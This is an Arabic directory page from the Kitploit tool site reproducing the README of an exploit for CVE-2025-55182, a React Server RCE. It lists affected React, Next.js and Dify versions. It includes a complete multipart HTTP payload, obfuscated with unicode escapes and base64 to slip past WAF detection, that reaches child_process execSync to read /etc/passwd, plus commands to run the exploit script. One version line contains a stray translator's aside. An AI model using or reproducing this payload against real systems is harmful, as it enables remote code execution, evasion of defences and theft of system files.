Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-React-RCE — [إعادة إظهار الثغرة] أول أداة استغلال في العالم تعتمد على ميزات RSC لتجاوز كشف WAF لثغرة CVE-2025-55182 React Server RCE. | Kitploit
أدوات/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقتطوير الحمولات
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[إعادة إظهار الثغرة] أول أداة استغلال في العالم تعتمد على ميزات RSC لتجاوز كشف WAF لثغرة CVE-2025-55182 React Server RCE.

عرض المستودع
1514منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182-React-RCE

مقدمة المشروع والمبدأ

  • أول EXP في العالم لثغرة CVE-2025-55182 React Server RCE التي تتجاوز اكتشاف WAF باستخدام ميزات RSC.
  • The world’s first CVE‑2025‑55182 React Server RCE exploit that can bypass WAF detection by leveraging RSC-specific features.
  • تحقيق RCE في بيئة React Server الافتراضية.
  • إضافة EXP أصلي جديد يدعم سيناريوهات تجاوز WAF. المبدأ: في getOutlinedModel يمكن الإشارة عبر الكتل + الإشارة التدريجية إلى JSON.
  • توفير بيئة إعادة إنتاج مبسطة للغاية.

مميزات EXP

  • لا حاجة لـ __proto__:then و constructor:constructor لتحقيق RCE.
  • لن تظهر الكلمات المفتاحية التي يعترضها WAF بشكل متكرر مثل "then": $1:__proto__:then و "get": $1:constructor:constructor و require('child_process').
  • EXP واحد متوافق مع بيئات React Server الأصلية و Next.js و Dify بالإعدادات الافتراضية.

مميزات بيئة إعادة الإنتاج

  • بسيطة للغاية.
  • إعداد سريع.

نظرة عامة على الثغرة

معلوماتالمحتوى
اسم الثغرةReact Server RCE
رقم الثغرةCVE-2025-55182
مستوى الخطرعالي
نوع الثغرةRCE
صعوبة الاستغلالمنخفضة

الإصدارات المتأثرة

  • إصدارات React المتأثرة == 19.0.0
  • إصدارات React المتأثرة == 19.0.1
  • إصدارات React المتأثرة == 19.1.0
  • إصدارات React المتأثرة == 19.2.0
  • حزمة react-server-dom-webpack الإصدارات المتأثرة == 19.0.0، 19.0.1، 19.1.0، 19.1.1، 19.2.0
  • حزمة react-server-dom-parcel الإصدارات المتأثرة == 19.0.0، 19.0.1، 19.1.0، 19.1.1، 19.2.0
  • حزمة react-server-dom-turbopack الإصدارات المتأثرة == 19.0.0، 19.0.1، 19.1.0، 19.1.1، 19.2.0
  • إصدارات Next.js المتأثرة >= 14.3.0-canary.77
  • Next.js 15.0.0 <= الإصدارات المتأثرة < 15.0.5
  • Next.js 15.1.0 <= الإصدارات المتأثرة < 15.1.9
  • Next.js 15.2.0 <= الإصدارات المتأثرة < 15.2.6
  • Next.js 15.3.0 <= الإصدارات المتأثرة < 15.3.6
  • Next.js 15.4.0 <= الإصدارات المتأثرة < 15.4.8
  • Next.js 15.5.0 <= الإصدارات المتأثرة < 15.5.7
  • Next.js 16.0.0 <= الإصدارات المتأثرة < 16.0.7
  • Dify 1.1.2 <= الإصدارات المتأثرة < 10.1-fix.1 (تم تعديل "1.10.1-fix.1" إلى "10.1-fix.1" كما في النص الأصلي؟ لا، النص الأصلي يحتوي على 1.10.1-fix.1، يجب الحفاظ عليه. الترجمة: Dify 1.1.2 <= الإصدارات المتأثرة < 1.10.1-fix.1)

EXP 1

يمكن استخدامه لسيناريوهات تجاوز WAF + السيناريو الافتراضي:

POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Length: 1445

------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="0"

"$@1"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="1"

{
    "\u0074\u0068\u0065\u006e": "$2:et",
    "status": "$2:es",
    "reason": "",
    "value": "$2:ev",
    "_response": "$2:er"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="2"

{
    "et": "$3",
    "es": "$4",
    "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
    "er": {
        "_prefix": "$2:ep",
        "_formData": "$2:ef"
    },
    "ep": "$5",
    "ef": {
        "get": "$2:eg"
    },
    "eg": "$6"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="3"

"$0:\u0074\u0068\u0065\u006e"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="4"

"\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="5"

"x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28%27Y2hpbGRfcHJvY2Vzcw%3D%3D%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28x))+'';throw Object.assign(new Error(y),{digest:y});"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="6"

"$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad--

إعادة الإنتاج 1

  1. بيئة الخادم:
react-server-dom-webpack 19.2.0
  1. تنزيل وتثبيت التبعيات المطلوبة لـ react-server-dom-webpack على الخادم:
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npm install
npm run dev -- --hostname 127.0.0.1 --port 3000

تم إنشاء الخدمة بنجاح: http://127.0.0.1:3000/

  1. استخدام EXP من العميل
python3 -m venv .venv
. ./.venv/bin/activate
pip3 install requests
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"

إعادة الإنتاج 2

  1. بيئة الخادم:
Next.js 16.0.6
وهو يتوافق أيضًا مع react-server-dom-webpack 19.2.0
  1. تنزيل وتثبيت التبعيات المطلوبة لـ Next.js على الخادم:
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
cd nextapp
npm run dev -- --hostname 127.0.0.1 --port 3000

تم إنشاء الخدمة بنجاح: http://127.0.0.1:3000/

  1. استخدام EXP من العميل (نفس ما سبق)
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
تنزيل الأداة